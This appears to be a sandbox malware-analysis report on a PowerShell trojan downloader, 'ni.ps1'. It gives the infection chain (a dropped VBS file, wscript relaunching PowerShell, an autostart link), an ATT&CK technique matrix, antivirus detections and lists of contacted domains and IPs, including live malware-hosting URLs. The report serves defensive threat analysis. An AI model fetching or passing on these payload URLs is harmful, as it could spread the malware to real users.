          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
MITRE ATT&CK Matrix (techniques listed per tactic; the number in parentheses is the signature count the report shows beside that technique)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Scripting (111); Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: Command and Scripting Interpreter (2); Exploitation for Client Execution (1); PowerShell (3); Cron; Launchd; Scheduled Task
Persistence: Scripting (111); Registry Run Keys / Startup Folder (1); DLL Side-Loading (1); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: Process Injection (11); Registry Run Keys / Startup Folder (1); DLL Side-Loading (1); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: Masquerading (1); Virtualization/Sandbox Evasion (21); Process Injection (11); Obfuscated Files or Information (1); DLL Side-Loading (1); Steganography
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: Security Software Discovery (1); Process Discovery (1); Virtualization/Sandbox Evasion (21); Application Window Discovery (1); File and Directory Discovery (2); System Information Discovery (12)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: Encrypted Channel (1); Ingress Tool Transfer (3); Non-Application Layer Protocol (3); Application Layer Protocol (14); Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
Behavior Graph ID: 1568993; Sample: ni.ps1; Start date: 05/12/2024; Architecture: WINDOWS; Score: 100
(The numbers after a process name are the created-registry-value and created-file counts the graph shows beside that node.)

Start node
• Contacted: www.fornid.com; fornid.com; 5 other IPs or domains
• Signatures: Antivirus detection for URL or domain; Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for submitted file; 7 other signatures
• Started: powershell.exe 16 23
  • Network: fornid.com 93.95.216.175, 443, 49704, SERVERPLAN-ASIT, Italy; www.pineappletech.ae 91.193.42.13, 443, 49711, ITFPL, Belgium
  • Dropped: C:\Users\Public\eji.vbs (ASCII)
  • Signature: Powershell creates an autostart link
  • Started: wscript.exe 1
    • Signatures: Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); Windows Scripting host queries suspicious COM object (likely to drop second stage); Suspicious execution chain found
    • Started: powershell.exe 36
      • Network: erp-royal-crown.info 148.251.114.233, 443, 49733, 49745, HETZNER-ASDE, Germany; almrwad.com 184.171.244.231, 443, 49765, 49793, DIMENOCUS, United States
      • Started: conhost.exe
      • Started: cmd.exe 1
  • Started: powershell.exe 23
    • Signature: Loading BitLocker PowerShell Module
  • Started: conhost.exe

Source | Detection | Scanner | Label
ni.ps1 | 29% | ReversingLabs | Script-PowerShell.Trojan.PShell
ni.ps1 | 100% | Avira | TR/PShell.Dldr.VPA
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
Source | Detection | Scanner | Label
https://www.fornid.com/wh/List%20of%20rzmhquirzmhd%20itzmhms%20and%20szmhrviczmhs.pdf | 0% | Avira URL Cloud | safe
https://www.almrwad.com/w | 0% | Avira URL Cloud | safe
https://www.erp-royal-crown.info/wh/Sar | 100% | Avira URL Cloud | phishing
https://www.fornid.com/ordine | 0% | Avira URL Cloud | safe
https://www.fornid.com/sitemap | 0% | Avira URL Cloud | safe
https://www.almrwad.com/wh/Sarot | 0% | Avira URL Cloud | safe
https://www.almrwad.com/wh/Saroth | 0% | Avira URL Cloud | safe
https://www.fornid.com/314-scarpe-antinfortunistiche-e-stivale-da-lavoro | 0% | Avira URL Cloud | safe
https://www.almrwad.com/wh/Sarothru | 0% | Avira URL Cloud | safe
https://www.erp-royal-crown.info/wh/Sarothrum.j | 100% | Avira URL Cloud | phishing
https://www.pineappletech.ae/ov/wh.vbs | 100% | Avira URL Cloud | malware
https://www.fornid.com/wh/List | 0% | Avira URL Cloud | safe
https://www.fornid.com/145-maschere-antigas | 0% | Avira URL Cloud | safe
https://www.almrwad.com/wh/Sar | 0% | Avira URL Cloud | safe
http://www.almrwad.com | 0% | Avira URL Cloud | safe
https://www.almrwad.com/ | 0% | Avira URL Cloud | safe
https://www.erp-royal-crown.info/wh/Sarothrum. | 100% | Avira URL Cloud | phishing
https://www.fornid.com/il-mio-account | 0% | Avira URL Cloud | safe
https://www.erp-royal-crown.in | 0% | Avira URL Cloud | safe
https://www.erp-royal-crown.info/wh/Sarothr | 100% | Avira URL Cloud | phishing
https://www.almrwad.com/wh/Sarothrum | 0% | Avira URL Cloud | safe
http://almrwad.comp | 0% | Avira URL Cloud | safe
http://erp-royal-crown.info | 100% | Avira URL Cloud | phishing
https://www.almrwad.co | 0% | Avira URL Cloud | safe
http://www.erp-royal-crown.info | 100% | Avira URL Cloud | phishing
https://www.almrwad.com/wh/Sarothrum.j | 0% | Avira URL Cloud | safe
https://www.erp-royal-crown.info | 100% | Avira URL Cloud | phishing
https://www.fornid.com/90-maschere-per-saldatura | 0% | Avira URL Cloud | safe
https://www.almrwad.c | 0% | Avira URL Cloud | safe
https://www.pinzmhapplzmhtzmhch.azmh/ov/wh.vbs | 0% | Avira URL Cloud | safe
https://www.fornid.com/img/logo.jpg | 0% | Avira URL Cloud | safe
https://www.almrwad.com/wh | 0% | Avira URL Cloud | safe
https://www.erp-royal-crown.i | 0% | Avira URL Cloud | safe
https://www.fornid.com/themes/PRS070158/css/megnor/custom.css | 0% | Avira URL Cloud | safe
https://www.erp-royal-crown.info/wh/Sarothru | 100% | Avira URL Cloud | phishing
https://www.erp-royal-crown.info/wh/Sarothrum.jp | 100% | Avira URL Cloud | phishing
http://www.pineappletech.ae | 0% | Avira URL Cloud | safe
https://www.almrwad.com/wh/Sarothrum.jp | 0% | Avira URL Cloud | safe
https://www.fornid.com/133-occhiali-protettivi | 0% | Avira URL Cloud | safe
https://www.erp-royal-crown.info/wh/Sarothrum.jpb | 100% | Avira URL Cloud | malware
https://www.erp-royal-crown.info/wh/ | 100% | Avira URL Cloud | phishing
http://blog.fornid.com/ | 0% | Avira URL Cloud | safe
https://www.erp-royal-crown.info/wh/Sarot | 100% | Avira URL Cloud | phishing
https://www.fornid.com/contattaci | 0% | Avira URL Cloud | safe
https://www.almrwad.com/wh/ | 0% | Avira URL Cloud | safe
https://www.erp-royal-crown.info/wh/Sa | 100% | Avira URL Cloud | phishing
https://www.erp-royal-crown.info/wh/Saro | 100% | Avira URL Cloud | phishing
https://go.micro | 0% | Avira URL Cloud | safe
http://pesterbdd.com/images/Pester.png | 0% | Avira URL Cloud | safe
https://www.almrwad.com/wh/Sarothrum.jpb | 0% | Avira URL Cloud | safe
http://crl.mX | 0% | Avira URL Cloud | safe
http://www.fornid.com/content/13-international-shipments | 0% | Avira URL Cloud | safe
https://www.almrwad. | 0% | Avira URL Cloud | safe
https://www.fornid.com | 0% | Avira URL Cloud | safe
http://www.fornid.com | 0% | Avira URL Cloud | safe
http://www.fornid.com/ | 0% | Avira URL Cloud | safe
https://www.almrwad.com | 0% | Avira URL Cloud | safe
https://www.fornid.com/cerca | 0% | Avira URL Cloud | safe
https://www.fornid.com/wh/List%20of%20required%20items%20and%20services.pdf | 100% | Avira URL Cloud | malware
https://www.almrwad.com/wh/Saro | 0% | Avira URL Cloud | safe
http://almrwad.com | 0% | Avira URL Cloud | safe
https://www.almrwad.com/wh/S | 0% | Avira URL Cloud | safe
https://www.almrwad.com/wh/Sa | 0% | Avira URL Cloud | safe
https://www.fornid.com/144-filtri-per-maschere | 0% | Avira URL Cloud | safe
https://www.erp-royal-crown.inf | 0% | Avira URL Cloud | safe
https://www.erp-royal-crown.info/ | 100% | Avira URL Cloud | phishing
https://www.erp-royal-crown.info/wh/Sarothrum | 100% | Avira URL Cloud | phishing
https://www.erp-royal-crown.info/w | 100% | Avira URL Cloud | phishing
https://www.fornid.com/62-mascherine-protettive-ffp1-ffp2-ffp3 | 0% | Avira URL Cloud | safe
https://www.erp-royal-crown.info/wh/S | 100% | Avira URL Cloud | phishing
https://www.pineappletech.ae | 0% | Avira URL Cloud | safe
https://www.erp-royal-crown. | 0% | Avira URL Cloud | safe
https://www.erp-royal-crown.info/wh | 100% | Avira URL Cloud | phishing
https://www.almrwad.com/wh/Sarothr | 0% | Avira URL Cloud | safe
https://www.erp-royal-crown.info/wh/Saroth | 100% | Avira URL Cloud | phishing
https://www.almrwad.com/wh/Sarothrum. | 0% | Avira URL Cloud | safe
http://fornid.com | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
erp-royal-crown.info | 148.251.114.233 | true | false | | unknown
almrwad.com | 184.171.244.231 | true | false | | unknown
fornid.com | 93.95.216.175 | true | true | | unknown
www.pineappletech.ae | 91.193.42.13 | true | false | | unknown
www.fornid.com | unknown | unknown | true | | unknown
www.almrwad.com | unknown | unknown | false | | unknown
www.erp-royal-crown.info | unknown | unknown | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://www.pineappletech.ae/ov/wh.vbs | true | Avira URL Cloud: malware | unknown
https://www.erp-royal-crown.info/wh/Sarothrum.jpb | true | Avira URL Cloud: malware | unknown
https://www.almrwad.com/wh/Sarothrum.jpb | false | Avira URL Cloud: safe | unknown
https://www.fornid.com/wh/List%20of%20required%20items%20and%20services.pdf | false | Avira URL Cloud: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://www.almrwad.com/w | powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.almrwad.com/wh/Sarothru | powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.fornid.com/sitemap | powershell.exe, 00000000.00000002.2327446000.0000023901B22000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.fornid.com/wh/List%20of%20rzmhquirzmhd%20itzmhms%20and%20szmhrviczmhs.pdf | powershell.exe, 00000000.00000002.2327446000.0000023901632000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.erp-royal-crown.info/wh/Sarothrum.j | powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: phishing | unknown
https://www.almrwad.com/wh/Saroth | powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.fornid.com/314-scarpe-antinfortunistiche-e-stivale-da-lavoro | powershell.exe, 00000000.00000002.2327446000.0000023901B22000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.erp-royal-crown.info/wh/Sar | powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: phishing | unknown
https://www.fornid.com/ordine | powershell.exe, 00000000.00000002.2327446000.0000023901B22000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.almrwad.com/wh/Sarot | powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.fornid.com/145-maschere-antigas | powershell.exe, 00000000.00000002.2327446000.0000023901B22000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2327446000.0000023901B1E000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.fornid.com/wh/List | powershell.exe, 00000000.00000002.2327446000.0000023901632000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/License | powershell.exe, 00000007.00000002.3482512250.00000263D06D2000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.almrwad.com/wh/Sar | powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.fornid.com/il-mio-account | powershell.exe, 00000000.00000002.2327446000.0000023901B22000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.almrwad.com | powershell.exe, 00000007.00000002.3388724978.00000263C0D59000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C11E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C195D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C1684000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C0B10000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C14EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C1727000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C0DA6000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.erp-royal-crown.in | powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.erp-royal-crown.info/wh/Sarothrum. | powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: phishing | unknown
http://go.micros | powershell.exe, 00000003.00000002.2190793958.000001DAB8199000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.almrwad.com/ | powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.erp-royal-crown.info/wh/Sarothr | powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: phishing | unknown
http://almrwad.comp | powershell.exe, 00000007.00000002.3388724978.00000263C0DA6000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.almrwad.com/wh/Sarothrum | powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.erp-royal-crown.info | powershell.exe, 00000007.00000002.3388724978.00000263C1C21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C2330000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C116E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C11E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C0B10000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C18E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C15CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C1727000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C0DA6000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: phishing | unknown
https://www.almrwad.co | powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.almrwad.com/wh/Sarothrum.j | powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://erp-royal-crown.info | powershell.exe, 00000007.00000002.3388724978.00000263C1C21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C2330000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C116E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C11E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C0B10000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C18E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C15CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C1727000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C0DA6000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: phishing | unknown
https://www.almrwad.c | powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                            https://www.erp-royal-crown.infopowershell.exe, 00000007.00000002.3388724978.00000263C1C21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C074E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C1521000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C116E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C11E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C09F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C0B10000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C18E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C1FD6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C1727000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C0DA6000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: phishing
                            unknown
                            https://www.fornid.com/90-maschere-per-saldaturapowershell.exe, 00000000.00000002.2327446000.0000023901B22000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://contoso.com/powershell.exe, 00000007.00000002.3482512250.00000263D06D2000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.2400652057.000002391006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2400652057.00000239101B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2216082915.000001DAC7780000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3482512250.00000263D058F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3482512250.00000263D06D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://www.pinzmhapplzmhtzmhch.azmh/ov/wh.vbspowershell.exe, 00000000.00000002.2327446000.0000023901CA3000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://www.fornid.com/img/logo.jpgpowershell.exe, 00000000.00000002.2327446000.0000023901B22000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.pineappletech.aepowershell.exe, 00000000.00000002.2327446000.0000023901F73000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://www.almrwad.com/whpowershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://www.fornid.com/133-occhiali-protettivipowershell.exe, 00000000.00000002.2327446000.0000023901B22000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://www.erp-royal-crown.ipowershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://www.erp-royal-crown.info/wh/Sarothrupowershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmptrue
                                • Avira URL Cloud: phishing
                                unknown
                                https://www.erp-royal-crown.info/wh/Sarothrum.jppowershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmptrue
                                • Avira URL Cloud: phishing
                                unknown
                                https://www.fornid.com/themes/PRS070158/css/megnor/custom.csspowershell.exe, 00000000.00000002.2327446000.0000023901B22000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.2327446000.0000023900001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2190793958.000001DAB7711000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C0521000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://www.almrwad.com/wh/Sarothrum.jppowershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://www.erp-royal-crown.info/wh/powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: phishing
                                  unknown
                                  http://blog.fornid.com/powershell.exe, 00000000.00000002.2327446000.0000023901B22000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://www.erp-royal-crown.info/wh/Saropowershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: phishing
                                  unknown
                                  https://www.erp-royal-crown.info/wh/Sarotpowershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: phishing
                                  unknown
                                  http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.2400652057.000002391006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2400652057.00000239101B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2216082915.000001DAC7780000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3482512250.00000263D058F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3482512250.00000263D06D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000003.00000002.2190793958.000001DAB793A000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://www.fornid.com/contattacipowershell.exe, 00000000.00000002.2327446000.0000023901B22000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
